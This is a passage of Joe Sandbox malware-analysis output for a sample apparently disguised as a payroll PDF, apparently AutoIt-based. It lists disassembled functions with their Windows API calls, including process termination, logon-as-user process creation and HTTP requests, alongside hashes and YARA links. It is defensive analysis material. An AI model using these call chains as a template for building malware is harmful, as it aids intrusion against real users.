Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: a2a975367c6d97fc5c11d27cc92d8184bf37c85cfd2b48e3d9ca7e5de5a95f9e
Instruction ID: 0c07bbc7bdf6950c19e166de006b0dc2c645aac7dfb9921dd8cc7abd4ff23072
Opcode Fuzzy Hash: a2a975367c6d97fc5c11d27cc92d8184bf37c85cfd2b48e3d9ca7e5de5a95f9e
Instruction Fuzzy Hash: BF11E132921A06FFDB508F64DD08BAE7B69FF42316F10406AE84693250CF319D10CB60

Function 002A8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002A8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 002A8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002A8B40
CloseHandle.KERNEL32(00000004), ref: 002A8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 002A8B8E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
Instruction ID: 77a6a4634b0d03459608ede7e13c408f15e3a737d938cff2d89a0c82740ba8bc
Opcode Fuzzy Hash: 480d3f20842d93a19eb900bbe48e8ebc86c02ef720ad4b8d889015d922733727
Instruction Fuzzy Hash: 5D112CB250124AABDF018FA4ED49FEA7BA9EF09308F044465FE05A2160CB759D64DB60

Function 002DC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 002512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0025134D
Part of subcall function 002512F3: SelectObject.GDI32(?,00000000), ref: 0025135C
Part of subcall function 002512F3: BeginPath.GDI32(?), ref: 00251373
Part of subcall function 002512F3: SelectObject.GDI32(?,00000000), ref: 0025139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002DC1C4
LineTo.GDI32(00000000,00000003,?), ref: 002DC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002DC1E6
LineTo.GDI32(00000000,00000000,?), ref: 002DC1F6
EndPath.GDI32(00000000), ref: 002DC206
StrokePath.GDI32(00000000), ref: 002DC216

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 9cb1a2d462c6b87ee537506dbf02211364f6914e697be9941a9d026d5006cd44
Instruction ID: ba82f4a770ccca84566b2ad8a0f2d5114591cd48ccce4e69efe3b934a8ec7bf9
Opcode Fuzzy Hash: 9cb1a2d462c6b87ee537506dbf02211364f6914e697be9941a9d026d5006cd44
Instruction Fuzzy Hash: CF110C7640010DBFDF129F90EC48EDA7FADEB08355F148022BD1956161C7719E55DBA0

Function 002703A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 002703D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 002703DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002703E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 002703F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 002703F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00270401

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
Instruction ID: 5ad20d3ca3b6f2223a3b3cb509e65e079b15f9a2dbdd5fe6d463a9155618187d
Opcode Fuzzy Hash: 6b4f097703683ffe54cbce7cee516c31c78cee4b11d62b66a3019bb501dbc2d6
Instruction Fuzzy Hash: 8B0148B09027597DE3008F5A8C85A52FFA8FF19354F00411BA15847941C7B5A864CBE5

Function 002B568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002B569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002B56B1
GetWindowThreadProcessId.USER32(?,?), ref: 002B56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002B56E0

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
Instruction ID: dd8b62f481cac392259b3d6ac93ea61aca1fcf5686a35ec44b91f77b22251f86
Opcode Fuzzy Hash: caae28fcb469c5966c1376310fc3995ef8162698c8232ee2801e1b2f1c142648
Instruction Fuzzy Hash: D9F09631542158BBD3605B52ED0DEEF7B7CEFC6B11F00016AF905D1050D7A05E0186F9

Function 002B74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 002B74E5
EnterCriticalSection.KERNEL32(?,?,00261044,?,?), ref: 002B74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00261044,?,?), ref: 002B7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00261044,?,?), ref: 002B7510

Part of subcall function 002B6ED7: CloseHandle.KERNEL32(00000000,?,002B751D,?,00261044,?,?), ref: 002B6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7523
LeaveCriticalSection.KERNEL32(?,?,00261044,?,?), ref: 002B752A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
Instruction ID: 158865ce9a80e7d56380c36b4d6042bd96ffc7106fe0ee23c248f2e7171a2922
Opcode Fuzzy Hash: fc76a081231791a7e6621c7979c91d4c43c26832b68be11c1f8ab8a9562f58c3
Instruction Fuzzy Hash: D5F05E3A942612EBDB512B64FE8CAEB772AEF45302B410532FA43A10B0CB755D11CB64

Function 002A8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A8E7F
UnloadUserProfile.USERENV(?,?), ref: 002A8E8B
CloseHandle.KERNEL32(?), ref: 002A8E94
CloseHandle.KERNEL32(?), ref: 002A8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 002A8EA5
HeapFree.KERNEL32(00000000), ref: 002A8EAC

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
Instruction ID: 2c5f7004c80368be5aaae94cdaa003d7457b9ff3ad298adda50b190ed230e6b5
Opcode Fuzzy Hash: d835e135be6aad7ff31c84b58415485df6a29cd5dad537c2360b155505ee9006
Instruction Fuzzy Hash: 64E0C236505001FBDA812FE5FE0C94ABB69FB89322B108232F21A81170CB329820DB58

Function 002A7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7C4A
CLSIDFromProgID.OLE32(?,?,00000000,002DFB80,000000FF,?,00000000,00000800,00000000,?,002E2C7C,?), ref: 002A7C6F
_memcmp.LIBCMT ref: 002A7C90

Strings

,,., xrefs: 002A7A85

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,.
API String ID: 314563124-737214711
Opcode ID: 5039a4c407b52c448090d0de860f63f7f42b37a660655d78619cf54cb4fd064c
Instruction ID: ea129f003ef386e1aac3d502d8f1e831653e748326dd5e6c06e2f1330ee5df9a
Opcode Fuzzy Hash: 5039a4c407b52c448090d0de860f63f7f42b37a660655d78619cf54cb4fd064c
Instruction Fuzzy Hash: 93810B71A1010AEFCB04DF94C984EEEB7BAFF89315F204599E506EB250DB71AE05CB64

Function 002C8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002C8928
CharUpperBuffW.USER32(?,?), ref: 002C8A37
VariantClear.OLEAUT32(?), ref: 002C8BAF

Part of subcall function 002B7804: VariantInit.OLEAUT32(00000000), ref: 002B7844
Part of subcall function 002B7804: VariantCopy.OLEAUT32(00000000,?), ref: 002B784D
Part of subcall function 002B7804: VariantClear.OLEAUT32(00000000), ref: 002B7859

Strings

Incorrect Parameter format, xrefs: 002C8960, 002C8B22
AUTOIT.ERROR, xrefs: 002C8A3D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f32e1217d04d27b07b7f4de48da9257045285d74208289991e2143f4f765dddc
Instruction ID: 44893924ad05f2d77e250bb03254e8b69a085154e89101104403e1918cb538b3
Opcode Fuzzy Hash: f32e1217d04d27b07b7f4de48da9257045285d74208289991e2143f4f765dddc
Instruction Fuzzy Hash: 33916B75628301DFC710DF24C484E5ABBE4AF89314F148A6EF89A8B361DB31ED59CB52

Function 002B2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0026FEC6: _wcscpy.LIBCMT ref: 0026FEE9

_memset.LIBCMT ref: 002B3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002B3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002B3187

Strings

0, xrefs: 002B3063

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: e0f35492b5718ce65cba7b0cbf5ca364ebd6472c0e3b33fee2c50c4b8d037de5
Instruction ID: d811821b312db76b8c4ee93f6f97e54ee1633df768c695cbcd13df2b2b83c3bb
Opcode Fuzzy Hash: e0f35492b5718ce65cba7b0cbf5ca364ebd6472c0e3b33fee2c50c4b8d037de5
Instruction Fuzzy Hash: D051C0316393029AD715EF2CD845AEBB7E8EF453A0F044A2DF899D3191DB70CE648B52

Function 002B2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002B2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 002B2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00316890,00000000), ref: 002B2D5A

Strings

0, xrefs: 002B2CA4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
Instruction ID: 46898d2e58b2c0dca28ceabbd9db4c791af04db7035f8ca458dddd297142f793
Opcode Fuzzy Hash: 0b7540681e32c89e1ddb60029de120dc1b975394365f38502369b4fb4c59c3d8
Instruction Fuzzy Hash: 48419F30215302DFD724DF24D845B9ABBE8BF85360F14461EF9669B291D770E918CBA2

Function 002CDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CDAD9

Part of subcall function 002579AB: _memmove.LIBCMT ref: 002579F9

Strings

cdecl, xrefs: 002CDB30
winapi, xrefs: 002CDB4A
none, xrefs: 002CDBB4
stdcall, xrefs: 002CDB5B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 0c28d492a942ab64dbbd066e615f473a0be6a48f092dfceb693c39eefe62c894
Instruction ID: fddc7bc4df342f5c586e7e26165c11b80c4262990fe882f61d7dc9499aed0e45
Opcode Fuzzy Hash: 0c28d492a942ab64dbbd066e615f473a0be6a48f092dfceb693c39eefe62c894
Instruction Fuzzy Hash: 0931737052061A9BCF10EF54CC919AEB3B4FF05314B108629E866976D1DB71AD19CF90

Function 002A9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 002AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 002AB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 002A9439

Part of subcall function 00257D2C: _memmove.LIBCMT ref: 00257D66

Strings

ListBox, xrefs: 002A93B5
ComboBox, xrefs: 002A9380

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: a74bd07252971ef0f1e2f8196a458e9c4e8f8941a799aab1f9519db396b37a86
Instruction ID: f8687998a40aad3410ff258d02546d48ab9e47419bcf1cb4b10fb7ca37dba745
Opcode Fuzzy Hash: a74bd07252971ef0f1e2f8196a458e9c4e8f8941a799aab1f9519db396b37a86
Instruction Fuzzy Hash: 54210471961104ABDB14AB71DC858FFB77CDF06310B10812AF926972E1DF344D6A8A10

Function 002C1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002C1B96
InternetCloseHandle.WININET(00000000), ref: 002C1BDD

Part of subcall function 002C2777: GetLastError.KERNEL32(?,?,002C1B0B,00000000,00000000,00000001), ref: 002C278C
Part of subcall function 002C2777: SetEvent.KERNEL32(?,?,002C1B0B,00000000,00000000,00000001), ref: 002C27A1

Strings

, xrefs: 002C1B87

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: ba7f6fbc647173b46f0ec7428dabe40593359b5d3bc6b72f0c9fb46bf31d8f19
Instruction ID: 01484b1b0e975a8c1b8f7361289499a244cf0935aacff2236fceb20290f6d4ea
Opcode Fuzzy Hash: ba7f6fbc647173b46f0ec7428dabe40593359b5d3bc6b72f0c9fb46bf31d8f19
Instruction Fuzzy Hash: ED21C2B1520208BFEB119F209CC6FBFB7ECEB4A748F10422EF405A2241EB709D255B61

Function 002D6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D66D0
LoadLibraryW.KERNEL32(?), ref: 002D66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D66EC
DestroyWindow.USER32(?), ref: 002D66F4

Strings

SysAnimate32, xrefs: 002D66AB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: f6a744f89a7dd8b7b1973f377ab4d4a23ac086aacad6589c6201ce429424d041
Instruction ID: 0b6d2250336255244af4da6164eea97a3deb823b2023e9c891132041754ba409
Opcode Fuzzy Hash: f6a744f89a7dd8b7b1973f377ab4d4a23ac086aacad6589c6201ce429424d041
Instruction Fuzzy Hash: 1B21C37112020ABFEF104F64EC88EBB77ADEF59368F10462AF911922D0D775CC619BA0

Function 002B703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002B705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B7091
GetStdHandle.KERNEL32(0000000C), ref: 002B70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002B70DD

Strings

nul, xrefs: 002B70D8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a32541537fe262c375c5ee3730ac1b9522a30bb2340919c353c44c0fb6bd1c2e
Instruction ID: efedb0959a2cfc71acdc3fc512e28a8ce40ef313e9de5e23e6d77be6eab7ede5
Opcode Fuzzy Hash: a32541537fe262c375c5ee3730ac1b9522a30bb2340919c353c44c0fb6bd1c2e
Instruction Fuzzy Hash: 642135755143069BDB20AF39DC09ADA77B4BF94760F204A1AFDA1D72D0D7709D60CB50

Function 002B710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002B712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B715D
GetStdHandle.KERNEL32(000000F6), ref: 002B716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002B71A8

Strings

